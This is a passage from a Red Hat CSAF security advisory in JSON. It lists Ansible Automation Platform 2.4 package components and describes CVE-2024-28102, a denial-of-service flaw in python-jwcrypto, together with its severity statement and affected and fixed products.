"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
